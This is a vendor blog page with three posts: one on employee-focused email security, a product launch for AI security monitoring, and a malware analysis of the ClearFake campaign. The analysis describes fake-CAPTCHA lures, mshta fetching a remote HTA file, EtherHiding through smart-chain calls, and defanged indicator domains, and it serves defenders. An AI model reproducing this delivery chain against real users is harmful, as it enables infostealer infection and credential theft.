Blog
/
Email
/
April 10, 2023

Employee-Conscious Email Security Solutions in the Workforce

Email threats commonly affect organizations. Read Darktrace's expert insights on how to safeguard your business by educating employees about email security.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Dan Fein
VP, Product
Written by
Carlos Gray
Senior Product Marketing Manager, Email
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
10
Apr 2023

When considering email security, IT teams have historically had to choose between excluding employees entirely, or including them but giving them too much power and implementing unenforceable, trust-based policies that try to make up for it. 

However, just because email security should not rely on employees, this does not mean they should be excluded entirely. Employees are the ones interacting with emails daily, and their experiences and behaviors can provide valuable security insights and even influence productivity. 

AI technology supports employee engagement in this non-intrusive, nuanced way to not only maintain email security, but also enhance it. 

Finding a Balance of Employee Involvement in Security Strategies

Historically, security solutions offered ‘all or nothing’ approaches to employee engagement. On one hand, when employees are involved, they are unreliable. Employees cannot all be experts in security on top of their actual job responsibilities, and mistakes are bound to happen in fast-paced environments.  

Although there have been attempts to raise security awareness, they often have shortcomings, as training emails lack context and realism, leaving employees with poor understandings that often lead to reporting emails that are actually safe. Having users constantly triaging their inboxes and reporting safe emails wastes time that takes away from their own productivity as well as the productivity of the security team.

Other historic forms of employee involvement also put security at risk. For example, users could create blanket rules through feedback, which could lead to common problems like safe-listing every email that comes from the gmail.com domain. Other times, employees could choose for themselves to release emails without context or limitations, introducing major risks to the organization. While these types of actions include employees to participate in security, they do so at the cost of security. 

Even lower stakes employee involvement can prove ineffective. For example, excessive warnings when sending emails to external contacts can lead to banner fatigue. When employees see the same warning message or alert at the top of every message, it’s human nature that they soon become accustomed and ultimately immune to it.

On the other hand, when employees are fully excluded from security, an opportunity is missed to fine-tune security according to the actual users and to gain feedback on how well the email security solution is working. 

So, both options of historically conventional email security, to include or exclude employees, prove incapable of leveraging employees effectively. The best email security practice strikes a balance between these two extremes, allowing more nuanced interactions that maintain security without interrupting daily business operations. This can be achieved with AI that tailors the interactions specifically to each employee to add to security instead of detracting from it. 

Reducing False Reports While Improving Security Awareness Training 

Humans and AI-powered email security can simultaneously level up by working together. AI can inform employees and employees can inform AI in an employee-AI feedback loop.  

By understanding ‘normal’ behavior for every email user, AI can identify unusual, risky components of an email and take precise action based on the nature of the email to neutralize them, such as rewriting links, flattening attachments, and moving emails to junk. AI can go one step further and explain in non-technical language why it has taken a specific action, which educates users. In contrast to point-in-time simulated phishing email campaigns, this means AI can share its analysis in context and in real time at the moment a user is questioning an email. 

The employee-AI feedback loop educates employees so that they can serve as additional enrichment data. It determines the appropriate levels to inform and teach users, while not relying on them for threat detection

In the other direction, the AI learns from users’ activity in the inbox and gradually factors this into its decision-making. This is not a ‘one size fits all’ mechanism – one employee marking an email as safe will never result in blanket approval across the business – but over time, patterns can be observed and autonomous decision-making enhanced.  

Figure 1: The employee-AI feedback loop increases employee understanding without putting security at risk.

The employee-AI feedback loop draws out the maximum potential benefits of employee involvement in email security. Other email security solutions only consider the security team, enhancing its workflow but never considering the employees that report suspicious emails. Employees who try to do the right thing but blindly report emails never learn or improve and end up wasting their own time. By considering employees and improving security awareness training, the employee-AI feedback loop can level up users. They learn from the AI explanations how to identify malicious components, and so then report fewer emails but with greater accuracy. 

While AI programs have classically acted like black boxes, Darktrace trains its AI on the best data, the organization’s actual employees, and invites both the security team and employees to see the reasoning behind its conclusions. Over time, employees will trust themselves more as they better learn how to discern unsafe emails. 

Leveraging AI to Generate Productivity Gains

Uniquely, AI-powered email security can have effects outside of security-related areas. It can save time by managing non-productive email. As the AI constantly learns employee behavior in the inbox, it becomes extremely effective at detecting spam and graymail – emails that aren't necessarily malicious, but clutter inboxes and hamper productivity. It does this on a per-user basis, specific to how each employee treats spam, graymail, and newsletters. The AI learns to detect this clutter and eventually learns which to pull from the inbox, saving time for the employees. This highlights how security solutions can go even further than merely protecting the email environment with a light touch, to the point where AI can promote productivity gains by automating tasks like inbox sorting.

Preventing Email Mishaps: How to Deal with Human Error

Improved user understanding and decision making cannot stop natural human error. Employees are bound to make mistakes and can easily send emails to the wrong people, especially when Outlook auto-fills the wrong recipient. This can have effects ranging anywhere from embarrassing to critical, with major implications on compliance, customer trust, confidential intellectual property, and data loss. 

However, AI can help reduce instances of accidentally sending emails to the wrong people. When a user goes to send an email in Outlook, the AI will analyze the recipients. It considers the contextual relationship between the sender and recipients, the relationships the recipients have with each other, how similar each recipient’s name and history is to other known contacts, and the names of attached files.  

If the AI determines that the email is outside of a user’s typical behavior, it may alert the user. Security teams can customize what the AI does next: it can block the email, block the email but allow the user to override it, or do nothing but invite the user to think twice. Since the AI analyzes each email, these alerts are more effective than consistent, blanket alerts warning about external recipients, which often go ignored. With this targeted approach, the AI prevents data leakage and reduces cyber risk. 

Since the AI is always on and continuously learning, it can adapt autonomously to employee changes. If the role of an employee evolves, the AI will learn the new normal, including common behaviors, recipients, attached file names, and more. This allows the AI to continue effectively flagging potential instances of human error, without needing manual rule changes or disrupting the employee’s workflow. 

Email Security Informed by Employee Experience

As the practical users of email, employees should be considered when designing email security. This employee-conscious lens to security can strengthen defenses, improve productivity, and prevent data loss.  

In these ways, email security can benefit both employees and security teams. Employees can become another layer of defense with improved security awareness training that cuts down on false reports of safe emails. This insight into employee email behavior can also enhance employee productivity by learning and sorting graymail. Finally, viewing security in relation to employees can help security teams deploy tools that reduce data loss by flagging misdirected emails. With these capabilities, Darktrace/Email™ enables security teams to optimize the balance of employee involvement in email security.

Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Dan Fein
VP, Product
Written by
Carlos Gray
Senior Product Marketing Manager, Email

Blog

/

/

February 3, 2026

Introducing Darktrace / SECURE AI: Complete AI Security Across Your Enterprise

Darktrace Secure AIDefault blog imageDefault blog image

Why securing AI can’t wait

AI is entering the enterprise faster than IT and security teams can keep up, appearing in SaaS tools, embedded in core platforms, and spun up by teams eager to move faster.  

As this adoption accelerates, it introduces unpredictable behaviors and expands the attack surface in ways existing security tools can’t see or control, startup or platform, they all lack one trait. These new types of risks command the attention of security teams and boardrooms, touching everything from business integrity to regulatory exposure.

Securing AI demands a fundamentally different approach, one that understands how AI behaves, how it interacts with data and users, and how risk emerges in real time. That shift is at the core of how organizations should be thinking about securing AI across the enterprise.

What is the current state of securing AI?

In Darktrace’s latest State of AI in Cybersecurity Report research across 1,500 cybersecurity professionals shows that the percentage of organizations without an AI adoption policy grew from 55% last year to 63% this year.

More troubling, the percentage of organizations without any plan to create an AI policy nearly tripled from 3% to 8%. Without clear policies, businesses are effectively accelerating blindfolded.

When we analyzed activity across our own customer base, we saw the same patterns playing out in their environments. Last October alone, we saw a 39% month-over-month increase in anomalous data uploads to generative AI services, with the average upload being 75MB. Given the size and frequency of these uploads, it's almost certain that much of this data should never be leaving the enterprise.

Many security teams still lack visibility into how AI is being used across their business; how it’s behaving, what it’s accessing, and most importantly, whether it’s operating safely. This unsanctioned usage quietly expands, creating pockets of AI activity that fall completely outside established security controls. The result is real organizational exposure with almost no visibility, underscoring just how widespread AI use has already become given the absence of formal policies.

This challenge doesn’t stop internally. Shadow AI extends into third-party tools, vendor platforms, and partner systems, where AI features are embedded without clear oversight.

Meanwhile, attackers are now learning to exploit AI’s unique characteristics, compounding the risks organizations are already struggling to manage.

The leader in AI cybersecurity now secures AI

Darktrace brings more than a decade of behavioral AI expertise built on an enterprise‑wide platform designed to operate in the complex, ambiguous environments where today’s AI now lives.  

Other cybersecurity technologies try to predict each new attack based on historical attacks. The problem is AI operates like humans do. Every action introduces new information that changes how AI behaves, its unpredictable, and historical attack tactics are now only a small part of the equation, forcing vendors to retrofit unproven acquisitions to secure AI.  

Darktrace is fundamentally different. Our Self‑Learning AI learns what “normal” looks like for your unique business: how your users, systems, applications, and now AI agents behave, how they communicate, and how data flows. This allows us to spot even the smallest shifts when something changes in meaningful ways. Long before AI agents were introduced, our technology was already interpreting nuance, detecting drift, uncovering hidden relationships, and making sense of ambiguous activity across networks, cloud, SaaS, email, OT, identities, and endpoints.

As AI introduces new behaviors, unstructured interactions, invisible pathways, and the rise of Shadow AI, these challenges have only intensified. But this is exactly the environment our platform was built for. Securing AI isn’t a new direction for Darktrace — it’s the natural evolution of the behavioral intelligence we’ve delivered to thousands of organizations worldwide.

Introducing Darktrace / SECURE AI – Complete AI security across your enterprise

We are proud to introduce Darktrace / SECURE AI, the newest product in the Darktrace ActiveAI Security Platform designed to secure AI across the whole enterprise.

This marks the next chapter in our mission to secure organizations from cyber threats and emerging risks. By combining full visibility, intelligent behavioral oversight, and real-time control, Darktrace is enabling enterprises to safely adopt, manage, and build AI within their business. This ensures that AI usage, data access, and behavior remain aligned to security baselines, compliance, and business goals.

Darktrace / SECURE AI can bring every AI interaction into a single view, helping teams understand intent, assess risk, protect sensitive data, and enforce policy across both human and AI Agent activity. Now organizations can embrace AI with confidence, with visibility to ensure it is operating safely, responsibly, and in alignment with their security and compliance needs.  

Because securing AI spans multiple areas and layers of complexity, Darktrace / SECURE AI is built around four foundational use cases that ensure your whole enterprise and every AI use affecting your business, whether owned or through third parties, is protected, they are:

  • Monitoring the prompts driving GenAI agents and assistants
  • Securing business AI agent identities in real time
  • Evaluating AI risks in development and deployment
  • Discovering and controlling Shadow AI

Monitoring the prompts driving GenAI agents and assistants

For AI systems, prompts are one of the most active and sensitive points of interaction—spanning human‑AI exchanges where users express intent and AI‑AI interactions where agents generate internal prompts to reason and coordinate. Because prompt language effectively is behavior, and because it relies on natural language rather than a fixed, finite syntax, the attack surface is open‑ended. This makes prompt‑driven risks far more complex than traditional API‑based vulnerabilities tied to CVEs.

Whether an attacker is probing for weaknesses, an employee inadvertently exposes sensitive data, or agents generate their own sub‑tasks to drive complex workflows, security teams must understand how prompt behavior shapes model behavior—and where that behavior can go wrong. Without that behavioral understanding, organizations face heightened risks of exploitation, drift, and cascading failures within their AI systems.

Darktrace / SECURE AI brings together all prompt activity across enterprise AI systems, including Microsoft Copilot and ChatGPT Enterprise, low‑code environments like Microsoft Copilot Studio, SaaS providers like Salesforce and Microsoft 365, and high‑code platforms such as AWS Bedrock and SageMaker, into a single, unified layer of visibility.  

Beyond visibility, Darktrace applies behavioral analytics to understand whether a prompt is unusual or risky in the context of the user, their peers, and the broader organization. Because AI attacks are far more complex and conversational than traditional exploits against fixed APIs – sharing more in common with email and Teams/Slack interactions, —this behavioral understanding is essential. By treating prompts as behavioral signals, Darktrace can detect conversational attacks, malicious chaining, and subtle prompt‑injection attempts, and where integrations allow, intervene in real time to block unsafe prompts or prevent harmful model actions as they occur.

Securing business AI agent identities in real time

As organizations adopt more AI‑driven workflows, we’re seeing a rapid rise in autonomous and semi‑autonomous agents operating across the business. These agents operate within existing identities, with the capability to access systems, read and write data, and trigger actions across cloud platforms, internal infrastructure, applications, APIs, and third‑party services. Some identities are controlled, like users, others like the ones mentioned, can appear anywhere, with organizations having limited visibility into how they’re configured or how their permissions evolve over time.  

Darktrace / SECURE AI gives organizations a real‑time, identity‑centric understanding of what their AI agents are doing, not just what they were designed to do. It automatically discovers live agent identities operating across SaaS, cloud, network, endpoints, OT, and email, including those running inside third‑party environments.  

The platform maps how each agent is configured, what systems it accesses, and how it communicates, including activity such as MCP usage or interactions with storage services where sensitive data may reside.  

By continuously observing agent behavior across all domains, Darktrace / SECURE AI highlights when unnecessary or risky permissions are granted, when activity patterns deviate, or when agents begin chaining together actions in unintended ways. This real‑time audit trail allows organizations to evaluate whether agent actions align with intended operational parameters and catch anomalous or risky behavior early.    

Evaluating AI risks in development and deployment

In the build phase, new identities are created, entitlements accumulate, components are stitched together across SaaS, cloud, and internal environments, and logic starts taking shape through prompts and configurations.  

It’s a highly dynamic and often fragmented process, and even small missteps here, such as a misconfiguration in a created agent identity, can become major security issues once the system is deployed. This is why evaluating AI risk during development and deployment is critical.

Darktrace / SECURE AI brings clarity and control across this entire lifecycle — from the moment an AI system starts taking shape to the moment it goes live. It allows you to gain visibility into created identities and their access across hyperscalers, low‑code SaaS, and internal labs, supported by AI security posture management that surfaces misconfigurations, over‑entitlement, and anomalous building events. Darktrace/ SECURE AI then connects these development insights directly to prompt oversight, connecting how AI is being built to how it will behave once deployed.  The result is a safer, more predictable AI lifecycle where risks are discovered early, guardrails are applied consistently, and innovations move forward with confidence rather than guesswork.

Discovering and controlling Shadow AI

Shadow AI has now appeared across every corner of the enterprise. It’s not just an employee pasting internal data into an external chatbot; it includes unsanctioned agent builders, hidden MCP servers, rogue model deployments, and AI‑driven workflows running on devices or services no one expected to be using AI.  

Darktrace / SECURE AI brings this frontier into view by continuously analyzing interactions across cloud, networks, endpoints, OT, and SASE environments. It surfaces unapproved AI usage wherever it appears and distinguishes legitimate activity in sanctioned tools from misuse or high‑risk behavior. The system identifies hidden AI components and rogue agents, reveals unauthorized deployments and unexpected connections to external AI systems, and highlights risky data flows that deviate from business norms.

When the behavior warrants a response, Darktrace / SECURE AI enables policy enforcement that guides users back toward sanctioned options while containing unsafe or ungoverned adoption. This closes one of the fastest‑expanding security gaps in modern enterprises and significantly reduces the attack surface created by shadow AI.

Conclusion

What’s needed now along with policies and frameworks for AI adoption is the right tooling to detect threats based on AI behavior across shadow use, prompt risks, identity misuse, and AI development.  

Darktrace is uniquely positioned to secure AI, we’ve spent over a decade building AI that learns your business – understanding subtle behavior across the entire enterprise long before AI agents arrived. With over 10,000 customers relying on Darktrace as the last line of defense to capture threats others cannot, Securing AI isn’t a pivot for us, it's not an acquisition; it’s the natural extension of the behavioral expertise and enterprise‑wide intelligence our platform was built on from the start.  

To learn more about how to secure AI at your organization we curated a readiness program that brings together IT and security leaders navigating this responsibility, providing a forum to prepare for high-impact decisions, explore guardrails, and guide the business amid growing uncertainty and pressure.

Sign up for the Secure AI Readiness Program here: This gives you exclusive access to the latest news on the latest AI threats, updates on emerging approaches shaping AI security, and insights into the latest innovations, including Darktrace’s ongoing work in this area.

Ready to talk with a Darktrace expert on securing AI? Register here to receive practical guidance on the AI risks that matter most to your business, paired with clarity on where to focus first across governance, visibility, risk reduction, and long-term readiness.  

Continue reading
About the author
Brittany Woodsmall
Product Marketing Manager, AI

Blog

/

Endpoint

/

February 1, 2026

ClearFake: From Fake CAPTCHAs to Blockchain-Driven Payload Retrieval

fake captcha to blockchain driven palyload retrievalDefault blog imageDefault blog image

What is ClearFake?

As threat actors evolve their techniques to exploit victims and breach target networks, the ClearFake campaign has emerged as a significant illustration of this continued adaptation. ClearFake is a campaign observed using a malicious JavaScript framework deployed on compromised websites, impacting sectors such as e‑commerce, travel, and automotive. First identified in mid‑2023, ClearFake is frequently leveraged to socially engineer victims into installing fake web browser updates.

In ClearFake compromises, victims are steered toward compromised WordPress sites, often positioned by attackers through search engine optimization (SEO) poisoning. Once on the site, users are presented with a fake CAPTCHA. This counterfeit challenge is designed to appear legitimate while enabling the execution of malicious code. When a victim interacts with the CAPTCHA, a PowerShell command containing a download string is retrieved and executed.

Attackers commonly abuse the legitimate Microsoft HTML Application Host (MSHTA) in these operations. Recent campaigns have also incorporated Smart Chain endpoints, such as “bsc-dataseed.binance[.]org,” to obtain configuration code. The primary payload delivered through ClearFake is typically an information stealer, such as Lumma Stealer, enabling credential theft, data exfiltration, and persistent access [1].

Darktrace’s Coverage of ClearFake

Darktrace / ENDPOINT first detected activity likely associated with ClearFake on a single device on over the course of one day on November 18, 2025. The system observed the execution of “mshta.exe,” the legitimate Microsoft HTML Application Host utility. It also noted a repeated process command referencing “weiss.neighb0rrol1[.]ru”, indicating suspicious external activity. Subsequent analysis of this endpoint using open‑source intelligence (OSINT) indicated that it was a malicious, domain generation algorithm (DGA) endpoint [2].

The process line referencing weiss.neighb0rrol1[.]ru, as observed by Darktrace / ENDPOINT.
Figure 1: The process line referencing weiss.neighb0rrol1[.]ru, as observed by Darktrace / ENDPOINT.

This activity indicates that mshta.exe was used to contact a remote server, “weiss.neighb0rrol1[.]ru/rpxacc64mshta,” and execute the associated HTA file to initiate the next stage of the attack. OSINT sources have since heavily flagged this server as potentially malicious [3].

The first argument in this process uses the MSHTA utility to execute the HTA file hosted on the remote server. If successful, MSHTA would then run JavaScript or VBScript to launch PowerShell commands used to retrieve malicious payloads, a technique observed in previous ClearFake campaigns. Darktrace also detected unusual activity involving additional Microsoft executables, including “winlogon.exe,” “userinit.exe,” and “explorer.exe.” Although these binaries are legitimate components of the Windows operating system, threat actors can abuse their normal behavior within the Windows login sequence to gain control over user sessions, similar to the misuse of mshta.exe.

EtherHiding cover

Darktrace also identified additional ClearFake‑related activity, specifically a connection to bsc-testnet.drpc[.]org, a legitimate BNB Smart Chain endpoint. This activity was triggered by injected JavaScript on the compromised site www.allstarsuae[.]com, where the script initiated an eth_call POST request to the Smart Chain endpoint.

Example of a fake CAPTCHA on the compromised site www.allstarsuae[.]com.
Figure 2: Example of a fake CAPTCHA on the compromised site www.allstarsuae[.]com.

EtherHiding is a technique in which threat actors leverage blockchain technology, specifically smart contracts, as part of their malicious infrastructure. Because blockchain is anonymous, decentralized, and highly persistent, it provides threat actors with advantages in evading defensive measures and traditional tracking [4].

In this case, when a user visits a compromised WordPress site, injected base64‑encoded JavaScript retrieved an ABI string, which was then used to load and execute a contract hosted on the BNB Smart Chain.

JavaScript hosted on the compromised site www.allstaruae[.]com.
Figure 3: JavaScript hosted on the compromised site www.allstaruae[.]com.

Conducting malware analysis on this instance, the Base64 decoded into a JavaScript loader. A POST request to bsc-testnet.drpc[.]org was then used to retrieve a hex‑encoded ABI string that loads and executes the contract. The JavaScript also contained hex and Base64‑encoded functions that decoded into additional JavaScript, which attempted to retrieve a payload hosted on GitHub at “github[.]com/PrivateC0de/obf/main/payload.txt.” However, this payload was unavailable at the time of analysis.

Darktrace’s detection of the POST request to bsc-testnet.drpc[.]org.
Figure 4: Darktrace’s detection of the POST request to bsc-testnet.drpc[.]org.
Figure 5: Darktrace’s detection of the executable file and the malicious hostname.

Autonomous Response

As Darktrace’s Autonomous Response capability was enabled on this customer’s network, Darktrace was able to take swift mitigative action to contain the ClearFake‑related activity early, before it could lead to potential payload delivery. The affected device was blocked from making external connections to a number of suspicious endpoints, including 188.114.96[.]6, *.neighb0rrol1[.]ru, and neighb0rrol1[.]ru, ensuring that no further malicious connections could be made and no payloads could be retrieved.

Autonomous Response also acted to prevent the executable mshta.exe from initiating HTA file execution over HTTPS from this endpoint by blocking the attempted connections. Had these files executed successfully, the attack would likely have resulted in the retrieval of an information stealer, such as Lumma Stealer.

Autonomous Response’s intervention against the suspicious connectivity observed.
Figure 6: Autonomous Response’s intervention against the suspicious connectivity observed.

Conclusion

ClearFake continues to be observed across multiple sectors, but Darktrace remains well‑positioned to counter such threats. Because ClearFake’s end goal is often to deliver malware such as information stealers and malware loaders, early disruption is critical to preventing compromise. Users should remain aware of this activity and vigilant regarding fake CAPTCHA pop‑ups. They should also monitor unusual usage of MSHTA and outbound connections to domains that mimic formats such as “bsc-dataseed.binance[.]org” [1].

In this case, Darktrace was able to contain the attack before it could successfully escalate and execute. The attempted execution of HTA files was detected early, allowing Autonomous Response to intervene, stopping the activity from progressing. As soon as the device began communicating with weiss.neighb0rrol1[.]ru, an Autonomous Response inhibitor triggered and interrupted the connections.

As ClearFake continues to rise, users should stay alert to social engineering techniques, including ClickFix, that rely on deceptive security prompts.

Credit to Vivek Rajan (Senior Cyber Analyst) and Tara Gould (Malware Research Lead)

Edited by Ryan Traill (Analyst Content Lead)

Appendices

Darktrace Model Detections

Process / New Executable Launched

Endpoint / Anomalous Use of Scripting Process

Endpoint / New Suspicious Executable Launched

Endpoint / Process Connection::Unusual Connection from New Process

Autonomous Response Models

Antigena / Network::Significant Anomaly::Antigena Significant Anomaly from Client Block

List of Indicators of Compromise (IoCs)

  • weiss.neighb0rrol1[.]ru – URL - Malicious Domain
  • 188.114.96[.]6 – IP – Suspicious Domain
  • *.neighb0rrol1[.]ru – URL – Malicious Domain

MITRE Tactics

Initial Access, Drive-by Compromise, T1189

User Execution, Execution, T1204

Software Deployment Tools, Execution and Lateral Movement, T1072

Command and Scripting Interpreter, T1059

System Binary Proxy Execution: MSHTA, T1218.005

References

1.        https://www.kroll.com/en/publications/cyber/rapid-evolution-of-clearfake-delivery

2.        https://www.virustotal.com/gui/domain/weiss.neighb0rrol1.ru

3.        https://www.virustotal.com/gui/file/1f1aabe87e5e93a8fff769bf3614dd559c51c80fc045e11868f3843d9a004d1e/community

4.        https://www.packetlabs.net/posts/etherhiding-a-new-tactic-for-hiding-malware-on-the-blockchain/

Continue reading
About the author
Vivek Rajan
Cyber Analyst
Your data. Our AI.
Elevate your network security with Darktrace AI